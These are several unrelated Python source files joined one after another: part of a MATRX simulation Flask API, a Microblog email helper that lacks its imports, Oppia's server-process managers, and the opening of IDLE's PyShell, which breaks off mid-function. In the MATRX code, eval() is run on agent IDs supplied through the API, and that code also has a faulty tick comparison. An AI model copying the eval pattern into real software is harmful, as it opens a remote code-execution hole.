def __check_input(tick=None, ids=None):
"""
Checks if the passed parameters are valid.
Parameters
----------
tick: integer. Optional
Tick for which to fetch a state or message. Checks for existence.
ids: List. Optional
Agent IDs to check.
Returns
-------
Validity: Boolean.
Whether the tick and/or agent IDs are valid
"""
if tick is not None:
try:
tick = int(tick)
except:
return False, {'error_code': 400,
'error_message': f'Tick has to be an integer, but is of type {type(tick)}'}
# check if the tick has actually occurred
if not tick in range(0, _current_tick + 1):
return False, {'error_code': 400,
'error_message': f'Indicated tick does not exist, has to be in range 0 - {_current_tick}, '
f'but is {tick}'}
# check if the tick was stored
if tick not in __states.keys():
return False, {'error_code': 400,
'error_message': f'Indicated tick {tick} is not stored, only the {_nr_states_to_store} ticks '
f'are stored that occurred before the current tick {_current_tick}'}
return True, None
def __fetch_state_dicts(tick, ids=None):
""" This private function fetches, filters and orders the states as specified by the tick and agent ids.
Parameters
----------
tick
Tick from which onwards to return the states. Thus will return a list of length [tick:current_tick]. The `tick`
will checked for whether it was actually stored. If not, an exception is raised.
ids
Id(s) from agents/god for which to return the states. Either a single agent ID or a list of agent IDs.
God view = "god"
Returns
-------
Returns a list of length [tick:current_tick]. For each tick, a dictionary contains the states for each agent as
specified in `agent_ids`, indexed by their agent ID.
"""
# Verify tick
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
tick = int(tick)
# return all states
if ids is None:
# Get the right states based on the tick and return them
return_states = [state for t, state in __states.items() if t >= tick <= _current_tick]
return return_states
# convert ints to lists so we can use 1 uniform approach
try:
ids = eval(ids)
except:
ids = [ids]
# create a list containing the states from tick to current_tick containing the states of all desired agents/god
filtered_states = []
for t in range(tick, _current_tick + 1):
states_this_tick = {}
# add each agent's state for this tick
for agent_id in ids:
if agent_id in __states[t]:
# double check the state is of type dict and not a State object
if not isinstance(__states[t][agent_id]['state'], dict):
__states[t][agent_id]['state'] = __states[t][agent_id]['state'].as_dict()
# Get state at tick t and of agent agent_id
states_this_tick[agent_id] = __states[t][agent_id]
# save the states of all filtered agents for this tick
filtered_states.append(states_this_tick)
return filtered_states
def __filter_dict(state_dict, props, filters):
""" Filters a state dictionary to only a dict that contains props for all
objects that adhere to the filters. A filter is a combination of a
property and value."""
def find(obj_dict_pair):
# Get the object properties
obj_dict = obj_dict_pair[1]
# Check if all the desirable properties are in the object dict
if not all([p in obj_dict.keys() for p in props]):
return None
# Check if any filter property is present, if so check its value
def filter_applies(filter_):
filter_prop = filter_[0]
filter_val = filter_[1]
if filter_prop in obj_dict.keys():
return filter_val == obj_dict[filter_prop] \
or filter_val in obj_dict[filter_prop]
else:
return False # if filter is not present, we return False
# If filters are given, go over each filter to see if it applies
if filters is not None:
filter_results = map(filter_applies, filters.items())
# Check if all filters are either not applicable or return true
applies = all(filter_results)
if applies is False: # if it does not adhere to the filters
return None
# Filter the dict to only the required properties
new_dict = {p: obj_dict[p] for p in props}
# Return the new tuple
return obj_dict_pair[0], new_dict
# Map our find method to all state objects
filtered_objects = map(find, state_dict.items())
# Extract all state objects that have the required properties and adhere to
# the filters
objects = [obj_dict_pair for obj_dict_pair in filtered_objects
if obj_dict_pair is not None]
# Transform back to dict
objects = {obj_id: obj_dict for obj_id, obj_dict in objects}
# Return
return objects
def __reorder_state(state):
""" This private function makes the MATRX state ready for sending as a JSON object
Parameters
----------
state
The world state, a dictionary with object IDs as keys
Returns
-------
The world state, JSON serializable
"""
new_state = copy.copy(state.as_dict())
# loop through all objects in the state
for objID, obj in state.items():
if objID != "World":
# make the sense capability JSON serializable
if "sense_capability" in obj:
new_state[objID]["sense_capability"] = str(obj["sense_capability"])
return new_state
def _add_state(agent_id, state, agent_inheritence_chain, world_settings):
""" Saves the state of an agent for use via the api
Parameters
----------
agent_id
ID of the agent of who the state is
state
state as filtered by the agent
agent_inheritence_chain
inheritance_chain of classes, can be used to figure out type of agent
world_settings
This object contains all information on the MATRX world, such as tick and _grid_size. Some agents might filter
these out of their state, as such it is sent along seperatly to make sure the world settings, required by the
visualization, are passed along.
"""
# save the new general info on the MATRX World (once)
global _next_tick_info
if _next_tick_info == {}:
_next_tick_info = world_settings
# Make sure the world settings are in the state, as these are used by the visualization
if 'World' not in state:
state['World'] = world_settings
# state['World']['matrx_paused'] = matrx_paused
# reorder and save the new state along with some meta information
reordered_state = __reorder_state(state)
_temp_state[agent_id] = {'state': reordered_state, 'agent_inheritence_chain': agent_inheritence_chain}
def _next_tick():
""" Proceed to the next tick, publicizing data of the new tick via the api (the new states).
"""
# save the new general info
global _MATRX_info, _next_tick_info, __states
_MATRX_info = copy.copy(_next_tick_info)
_next_tick_info = {}
# print("Next ticK:", _MATRX_info);
# publicize the states of the previous tick
__states[_current_tick] = copy.copy(_temp_state)
# Limit the states stored
if len(__states) > _nr_states_to_store:
stored_ticks = list(__states.keys())
forget_from = _current_tick - _nr_states_to_store
for tick in stored_ticks:
if tick <= forget_from:
__states.pop(tick)
def _pop_userinput(agent_id):
""" Pop the user input for an agent from the userinput dictionary and return it
Parameters
----------
agent_id
ID of the agent for which to return the userinput
Returns
-------
A list of keys pressed. See this link for the encoding of keys:
https://developer.mozilla.org/nl/docs/Web/API/KeyboardEvent/key/Key_Values
"""
global _userinput
return _userinput.pop(agent_id, None)
def _reset_api():
""" Reset the MATRX api variables """
global _temp_state, _userinput, matrx_paused, _matrx_done, __states, _current_tick, tick_duration, _grid_size, \
_nr_states_to_store
global _MATRX_info, _next_tick_info, _received_messages, __current_world_ID
_temp_state = {}
_userinput = {}
matrx_paused = False
_matrx_done = False
__states = {}
_current_tick = 0
tick_duration = 0.0
_grid_size = [1, 1]
_nr_states_to_store = 5
_MATRX_info = {}
_next_tick_info = {}
_received_messages = {}
__current_world_ID = False
def _register_world(world_id):
""" Register a new simulation world
At the moment simulation of only one world at a time is supported, so this calling this function will discard
the previous world.
Parameters
----------
world_id
The ID of the world
"""
global __current_world_ID
__current_world_ID = world_id
#########################################################################
# api Flask methods
#########################################################################
def _flask_thread():
""" Starts the Flask server on localhost:3001
"""
if not _debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
__app.run(host='0.0.0.0', port=_port, debug=False, use_reloader=False)
def _run_api(verbose=False):
""" Creates a separate Python thread in which the api (Flask) is started
Returns
-------
MATRX api Python thread
"""
print("Starting background api server")
global _debug
_debug = verbose
print("Initialized app:", __app)
api_thread = threading.Thread(target=_flask_thread)
api_thread.start()
return api_thread
if __name__ == "__main__":
_run_api()
|
email.py
|
from flask import current_app
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
servers.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for managing server processes required by Oppia."""
from __future__ import annotations
import contextlib
import logging
import os
import re
import shutil
import signal
import subprocess
import sys
import threading
from core import feconf
from core import utils
from scripts import common
@contextlib.contextmanager
def managed_process(
command_args, human_readable_name='Process', shell=False,
timeout_secs=60, **popen_kwargs):
"""Context manager for starting and stopping a process gracefully.
Args:
command_args: list(int|str). A sequence of program arguments, where the
program to execute is the first item. Ints are allowed in order to
accomodate e.g. port numbers.
human_readable_name: str. The human-readable name of the process. Used
by the function's logging logic to improve readability.
shell: bool. Whether the command should be run inside of its own shell.
WARNING: Executing shell commands that incorporate unsanitized input
from an untrusted source makes a program vulnerable to
[shell injection](https://w.wiki/_Ac2), a serious security flaw
which can result in arbitrary command execution. For this reason,
the use of `shell=True` is **strongly discouraged** in cases where
the command string is constructed from external input.
timeout_secs: int. The time allotted for the managed process and its
descendants to terminate themselves. After the timeout, any
remaining processes will be killed abruptly.
**popen_kwargs: dict(str: *). Same kwargs as `subprocess.Popen`.
Yields:
psutil.Process. The process managed by the context manager.
"""
# TODO(#11549): Move this to top of the file.
if common.PSUTIL_DIR not in sys.path:
sys.path.insert(1, common.PSUTIL_DIR)
import psutil
get_proc_info = lambda p: (
'%s(name="%s", pid=%d)' % (human_readable_name, p.name(), p.pid)
if p.is_running() else '%s(pid=%d)' % (human_readable_name, p.pid))
stripped_args = (('%s' % arg).strip() for arg in command_args)
non_empty_args = (s for s in stripped_args if s)
command = ' '.join(non_empty_args) if shell else list(non_empty_args)
human_readable_command = command if shell else ' '.join(command)
msg = 'Starting new %s: %s' % (human_readable_name, human_readable_command)
print(msg)
popen_proc = psutil.Popen(command, shell=shell, **popen_kwargs)
try:
yield popen_proc
finally:
print('Stopping %s...' % get_proc_info(popen_proc))
procs_still_alive = [popen_proc]
try:
if popen_proc.is_running():
# Children must be terminated before the parent, otherwise they
# may become zombie processes.
procs_still_alive = (
popen_proc.children(recursive=True) + [popen_proc])
procs_to_kill = []
for proc in procs_still_alive:
if proc.is_running():
logging.info('Terminating %s...' % get_proc_info(proc))
proc.terminate()
procs_to_kill.append(proc)
else:
logging.info('%s has already ended.' % get_proc_info(proc))
procs_gone, procs_still_alive = (
psutil.wait_procs(procs_to_kill, timeout=timeout_secs))
for proc in procs_still_alive:
logging.warning('Forced to kill %s!' % get_proc_info(proc))
proc.kill()
for proc in procs_gone:
logging.info('%s has already ended.' % get_proc_info(proc))
except Exception:
# NOTE: Raising an exception while exiting a context manager is bad
# practice, so we log and suppress exceptions instead.
logging.exception(
'Failed to stop %s gracefully!' % get_proc_info(popen_proc))
@contextlib.contextmanager
def managed_dev_appserver(
app_yaml_path, env=None, log_level='info',
host='0.0.0.0', port=8080, admin_host='0.0.0.0', admin_port=8000,
enable_host_checking=True, automatic_restart=False,
skip_sdk_update_check=False):
"""Returns a context manager to start up and shut down a GAE dev appserver.
Args:
app_yaml_path: str. Path to the app.yaml file which defines the
structure of the server.
env: dict(str: str) or None. Defines the environment variables for the
new process.
log_level: str. The lowest log level generated by the application code
and the development server. Expected values are: debug, info,
warning, error, critical.
host: str. The host name to which the app server should bind.
port: int. The lowest port to which application modules should bind.
admin_host: str. The host name to which the admin server should bind.
admin_port: int. The port to which the admin server should bind.
enable_host_checking: bool. Whether to enforce HTTP Host checking for
application modules, API server, and admin server. Host checking
protects against DNS rebinding attacks, so only disable after
understanding the security implications.
automatic_restart: bool. Whether to restart instances automatically when
files relevant to their module are changed.
skip_sdk_update_check: bool. Whether to skip checking for SDK updates.
If false, uses .appcfg_nag to decide.
Yields:
psutil.Process. The dev_appserver process.
"""
dev_appserver_args = [
common.CURRENT_PYTHON_BIN,
common.DEV_APPSERVER_PATH,
'--host', host,
'--port', port,
'--admin_host', admin_host,
'--admin_port', admin_port,
'--enable_host_checking', 'true' if enable_host_checking else 'false',
'--automatic_restart', 'true' if automatic_restart else 'false',
'--skip_sdk_update_check', 'true' if skip_sdk_update_check else 'false',
'--log_level', log_level,
'--dev_appserver_log_level', log_level,
app_yaml_path
]
with contextlib.ExitStack() as stack:
# OK to use shell=True here because we are not passing anything that
# came from an untrusted user, only other callers of the script,
# so there's no risk of shell-injection attacks.
proc = stack.enter_context(managed_process(
dev_appserver_args,
human_readable_name='GAE Development Server',
shell=True,
env=env
))
common.wait_for_port_to_be_in_use(port)
yield proc
@contextlib.contextmanager
def managed_firebase_auth_emulator(recover_users=False):
"""Returns a context manager to manage the Firebase auth emulator.
Args:
recover_users: bool. Whether to recover users created by the previous
instance of the Firebase auth emulator.
Yields:
psutil.Process. The Firebase emulator process.
"""
emulator_args = [
common.FIREBASE_PATH, 'emulators:start', '--only', 'auth',
'--project', feconf.OPPIA_PROJECT_ID,
'--config', feconf.FIREBASE_EMULATOR_CONFIG_PATH,
]
emulator_args.extend(
['--import', common.FIREBASE_EMULATOR_CACHE_DIR, '--export-on-exit']
if recover_users else
['--export-on-exit', common.FIREBASE_EMULATOR_CACHE_DIR])
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
emulator_args, human_readable_name='Firebase Emulator', shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.FIREBASE_EMULATOR_PORT)
yield proc
@contextlib.contextmanager
def managed_elasticsearch_dev_server():
"""Returns a context manager for ElasticSearch server for running tests
in development mode and running a local dev server. This is only required
in a development environment.
Yields:
psutil.Process. The ElasticSearch server process.
"""
# Clear previous data stored in the local cluster.
if os.path.exists(common.ES_PATH_DATA_DIR):
shutil.rmtree(common.ES_PATH_DATA_DIR)
# -q is the quiet flag.
es_args = ['%s/bin/elasticsearch' % common.ES_PATH, '-q']
# Override the default path to ElasticSearch config files.
es_env = {'ES_PATH_CONF': common.ES_PATH_CONFIG_DIR}
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
es_args, human_readable_name='ElasticSearch Server', env=es_env,
shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.ES_LOCALHOST_PORT)
yield proc
@contextlib.contextmanager
def managed_cloud_datastore_emulator(clear_datastore=False):
"""Returns a context manager for the Cloud Datastore emulator.
Args:
clear_datastore: bool. Whether to delete the datastore's config and data
before starting the emulator.
Yields:
psutil.Process. The emulator process.
"""
emulator_hostport = '%s:%d' % (
feconf.CLOUD_DATASTORE_EMULATOR_HOST,
feconf.CLOUD_DATASTORE_EMULATOR_PORT)
emulator_args = [
common.GCLOUD_PATH, 'beta', 'emulators', 'datastore', 'start',
'--project', feconf.OPPIA_PROJECT_ID,
'--data-dir', common.CLOUD_DATASTORE_EMULATOR_DATA_DIR,
'--host-port', emulator_hostport,
'--consistency=1.0',
'--quiet'
]
if clear_datastore:
emulator_args.append('--no-store-on-disk')
with contextlib.ExitStack() as stack:
data_dir_exists = os.path.exists(
common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
if clear_datastore and data_dir_exists:
# Replace it with an empty directory.
shutil.rmtree(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
os.makedirs(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
elif not data_dir_exists:
os.makedirs(common.CLOUD_DATASTORE_EMULATOR_DATA_DIR)
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = stack.enter_context(managed_process(
emulator_args, human_readable_name='Cloud Datastore Emulator',
shell=True))
common.wait_for_port_to_be_in_use(feconf.CLOUD_DATASTORE_EMULATOR_PORT)
# Environment variables required to communicate with the emulator.
stack.enter_context(common.swap_env(
'DATASTORE_DATASET', feconf.OPPIA_PROJECT_ID))
stack.enter_context(common.swap_env(
'DATASTORE_EMULATOR_HOST', emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_EMULATOR_HOST_PATH', '%s/datastore' % emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_HOST', 'http://%s' % emulator_hostport))
stack.enter_context(common.swap_env(
'DATASTORE_PROJECT_ID', feconf.OPPIA_PROJECT_ID))
stack.enter_context(common.swap_env(
'DATASTORE_USE_PROJECT_ID_AS_APP_ID', 'true'))
stack.enter_context(common.swap_env(
'GOOGLE_CLOUD_PROJECT', feconf.OPPIA_PROJECT_ID))
yield proc
@contextlib.contextmanager
def managed_redis_server():
"""Run the redis server within a context manager that ends it gracefully."""
if common.is_windows_os():
raise Exception(
'The redis command line interface is not installed because your '
'machine is on the Windows operating system. The redis server '
'cannot start.')
# Check if a redis dump file currently exists. This file contains residual
# data from a previous run of the redis server. If it exists, removes the
# dump file so that the redis server starts with a clean slate.
if os.path.exists(common.REDIS_DUMP_PATH):
os.remove(common.REDIS_DUMP_PATH)
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
[common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH],
human_readable_name='Redis Server', shell=True)
with proc_context as proc:
common.wait_for_port_to_be_in_use(feconf.REDISPORT)
try:
yield proc
finally:
subprocess.check_call([common.REDIS_CLI_PATH, 'shutdown', 'nosave'])
def create_managed_web_browser(port):
"""Returns a context manager for a web browser targeting the given port on
localhost. If a web browser cannot be opened on the current system by Oppia,
then returns None instead.
Args:
port: int. The port number to open in the web browser.
Returns:
context manager|None. The context manager to a web browser window, or
None if the current operating system does not support web browsers.
"""
url = 'http://localhost:%s/' % port
human_readable_name = 'Web Browser'
if common.is_linux_os():
if any(re.match('.*VBOX.*', d) for d in os.listdir('/dev/disk/by-id/')):
return None
else:
return managed_process(
['xdg-open', url], human_readable_name=human_readable_name)
elif common.is_mac_os():
return managed_process(
['open', url], human_readable_name=human_readable_name)
else:
return None
@contextlib.contextmanager
def managed_webpack_compiler(
config_path=None, use_prod_env=False, use_source_maps=False,
watch_mode=False, max_old_space_size=None):
"""Returns context manager to start/stop the webpack compiler gracefully.
Args:
config_path: str|None. Path to an explicit webpack config, or None to
determine it from the other args.
use_prod_env: bool. Whether to compile for use in production. Only
respected if config_path is None.
use_source_maps: bool. Whether to compile with source maps. Only
respected if config_path is None.
watch_mode: bool. Run the compiler in watch mode, which rebuilds on file
change.
max_old_space_size: int|None. Sets the max memory size of the compiler's
"old memory" section. As memory consumption approaches the limit,
the compiler will spend more time on garbage collection in an effort
to free unused memory.
Yields:
psutil.Process. The Webpack compiler process.
"""
if config_path is not None:
pass
elif use_prod_env:
config_path = (
common.WEBPACK_PROD_SOURCE_MAPS_CONFIG if use_source_maps else
common.WEBPACK_PROD_CONFIG)
else:
config_path = (
common.WEBPACK_DEV_SOURCE_MAPS_CONFIG if use_source_maps else
common.WEBPACK_DEV_CONFIG)
compiler_args = [
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH, '--config', config_path,
]
if max_old_space_size:
# NOTE: --max-old-space-size is a flag for Node.js, not the Webpack
# compiler, so we insert it immediately after NODE_BIN_PATH.
compiler_args.insert(1, '--max-old-space-size=%d' % max_old_space_size)
if watch_mode:
compiler_args.extend(['--color', '--watch', '--progress'])
with contextlib.ExitStack() as exit_stack:
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = exit_stack.enter_context(managed_process(
compiler_args, human_readable_name='Webpack Compiler', shell=True,
# Capture compiler's output to detect when builds have completed.
stdout=subprocess.PIPE))
if watch_mode:
for line in iter(lambda: proc.stdout.readline() or None, None):
common.write_stdout_safe(line)
# Message printed when a compilation has succeeded. We break
# after the first one to ensure the site is ready to be visited.
if b'Built at: ' in line:
break
else:
# If none of the lines contained the string 'Built at',
# raise an error because a build hasn't finished successfully.
raise IOError('First build never completed')
def print_proc_output():
"""Prints the proc's output until it is exhausted."""
for line in iter(lambda: proc.stdout.readline() or None, None):
common.write_stdout_safe(line)
# Start a thread to print the rest of the compiler's output to stdout.
printer_thread = threading.Thread(target=print_proc_output)
printer_thread.start()
exit_stack.callback(printer_thread.join)
yield proc
@contextlib.contextmanager
def managed_portserver():
"""Returns context manager to start/stop the portserver gracefully.
The portserver listens at PORTSERVER_SOCKET_FILEPATH and allocates free
ports to clients. This prevents race conditions when two clients request
ports in quick succession. The local Google App Engine server that we use to
serve the development version of Oppia uses python_portpicker, which is
compatible with the portserver this function starts, to request ports.
By "compatible" we mean that python_portpicker requests a port by sending a
request consisting of the PID of the requesting process and expects a
response consisting of the allocated port number. This is the interface
provided by this portserver.
Yields:
psutil.Popen. The Popen subprocess object.
"""
# TODO(#11549): Move this to top of the file.
if common.PSUTIL_DIR not in sys.path:
# Our unit tests already configure sys.path correctly, but the
# standalone scripts do not. Because of this, the following line cannot
# be covered. This is fine since we want to cleanup this code anyway in
# #11549.
sys.path.insert(1, common.PSUTIL_DIR) # pragma: no cover
import psutil
# Check if a socket file exists. This file can exist when previous instance
# of the portserver did not close properly. We need to remove as otherwise
# the portserver will fail to start.
if os.path.exists(common.PORTSERVER_SOCKET_FILEPATH):
os.remove(common.PORTSERVER_SOCKET_FILEPATH)
portserver_args = [
'python', '-m', 'scripts.run_portserver',
'--portserver_unix_socket_address', common.PORTSERVER_SOCKET_FILEPATH,
]
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc_context = managed_process(
portserver_args, human_readable_name='Portserver', shell=True)
with proc_context as proc:
try:
yield proc
finally:
# Before exiting the proc_context, try to end the process with
# SIGINT. The portserver is configured to shut down cleanly upon
# receiving this signal.
try:
proc.send_signal(signal.SIGINT)
except OSError:
# Raises when the process has already shutdown, in which case we
# can just return immediately.
return # pylint: disable=lost-exception
else:
# Otherwise, give the portserver 10 seconds to shut down after
# sending CTRL-C (SIGINT).
try:
proc.wait(timeout=10)
except psutil.TimeoutExpired:
# If the server fails to shut down, allow proc_context to
# end it by calling terminate() and/or kill().
pass
@contextlib.contextmanager
def managed_webdriver_server(chrome_version=None):
"""Returns context manager to start/stop the Webdriver server gracefully.
This context manager updates Google Chrome before starting the server.
Args:
chrome_version: str|None. The version of Google Chrome to run the tests
on. If None, then the currently-installed version of Google Chrome
is used instead.
Yields:
psutil.Process. The Webdriver process.
"""
if chrome_version is None:
# Although there are spaces between Google and Chrome in the path, we
# don't need to escape them for Popen (as opposed to on the terminal, in
# which case we would need to escape them for the command to run).
chrome_command = (
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if common.is_mac_os() else 'google-chrome')
try:
output = subprocess.check_output([chrome_command, '--version'])
except OSError:
# For the error message on macOS, we need to add the backslashes in.
# This is because it is likely that a user will try to run the
# command on their terminal and, as mentioned above, the macOS
# chrome version command has spaces in the path which need to be
# escaped for successful terminal use.
raise Exception(
'Failed to execute "%s --version" command. This is used to '
'determine the chromedriver version to use. Please set the '
'chromedriver version manually using the '
'--chrome_driver_version flag. To determine the '
'chromedriver version to be used, please follow the '
'instructions mentioned in the following URL:\n'
'https://chromedriver.chromium.org/downloads/version-selection'
% chrome_command.replace(' ', r'\ '))
installed_version_parts = b''.join(re.findall(rb'[0-9.]', output))
installed_version = '.'.join(
installed_version_parts.decode('utf-8').split('.')[:-1])
response = utils.url_open(
'https://chromedriver.storage.googleapis.com/LATEST_RELEASE_%s' % (
installed_version))
chrome_version = response.read().decode('utf-8')
print('\n\nCHROME VERSION: %s' % chrome_version)
subprocess.check_call([
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH, 'update',
'--versions.chrome', chrome_version,
])
with contextlib.ExitStack() as exit_stack:
if common.is_windows_os():
# NOTE: webdriver-manager (version 13.0.0) uses `os.arch()` to
# determine the architecture of the operating system, however, this
# function can only be used to determine the architecture of the
# machine that compiled `node`. In the case of Windows, we are using
# the portable version, which was compiled on `ia32` machine so that
# is the value returned by this `os.arch` function. Unfortunately,
# webdriver-manager seems to assume that Windows wouldn't run on the
# ia32 architecture, so its help function used to determine download
# link returns null for this, which means that the application has
# no idea about where to download the correct version.
#
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/chromedriver.ts#L16
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/geckodriver.ts#L21
# https://github.com/angular/webdriver-manager/blob/b7539a5a3897a8a76abae7245f0de8175718b142/lib/provider/chromedriver.ts#L167
# https://github.com/nodejs/node/issues/17036
regex_pattern = re.escape('this.osArch = os.arch();')
arch = 'x64' if common.is_x64_architecture() else 'x86'
replacement_string = 'this.osArch = "%s";' % arch
exit_stack.enter_context(common.inplace_replace_file_context(
common.CHROME_PROVIDER_FILE_PATH, regex_pattern,
replacement_string))
exit_stack.enter_context(common.inplace_replace_file_context(
common.GECKO_PROVIDER_FILE_PATH, regex_pattern,
replacement_string))
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
proc = exit_stack.enter_context(managed_process([
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH, 'start',
'--versions.chrome', chrome_version, '--quiet', '--standalone',
], human_readable_name='Webdriver manager', shell=True))
common.wait_for_port_to_be_in_use(4444)
yield proc
@contextlib.contextmanager
def managed_protractor_server(
suite_name='full', dev_mode=True, debug_mode=False,
sharding_instances=1, **kwargs):
"""Returns context manager to start/stop the Protractor server gracefully.
Args:
suite_name: str. The suite name whose tests should be run. If the value
is `full`, all tests will run.
dev_mode: bool. Whether the test is running on dev_mode.
debug_mode: bool. Whether to run the protractor tests in debugging mode.
Read the following instructions to learn how to run e2e tests in
debugging mode:
https://www.protractortest.org/#/debugging#disabled-control-flow.
sharding_instances: int. How many sharding instances to be running.
**kwargs: dict(str: *). Keyword arguments passed to psutil.Popen.
Yields:
psutil.Process. The protractor process.
"""
if sharding_instances <= 0:
raise ValueError('Sharding instance should be larger than 0')
protractor_args = [
common.NODE_BIN_PATH,
# This flag ensures tests fail if the `waitFor()` calls time out.
'--unhandled-rejections=strict',
common.PROTRACTOR_BIN_PATH, common.PROTRACTOR_CONFIG_FILE_PATH,
'--params.devMode=%s' % dev_mode,
'--suite', suite_name,
]
if debug_mode:
# NOTE: This is a flag for Node.js, not Protractor, so we insert it
# immediately after NODE_BIN_PATH.
protractor_args.insert(1, '--inspect-brk')
if sharding_instances > 1:
protractor_args.extend([
'--capabilities.shardTestFiles=True',
'--capabilities.maxInstances=%d' % sharding_instances,
])
# OK to use shell=True here because we are passing string literals and
# constants, so there is no risk of a shell-injection attack.
managed_protractor_proc = managed_process(
protractor_args, human_readable_name='Protractor Server', shell=True,
**kwargs)
with managed_protractor_proc as proc:
yield proc
|
PyShell.py
|
#! /usr/bin/env python3
import getopt
import os
import os.path
import re
import socket
import subprocess
import sys
import threading
import time
import tokenize
import traceback
import types
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkinter.messagebox as tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way."""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n" % (category.__name__, message)
return s
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
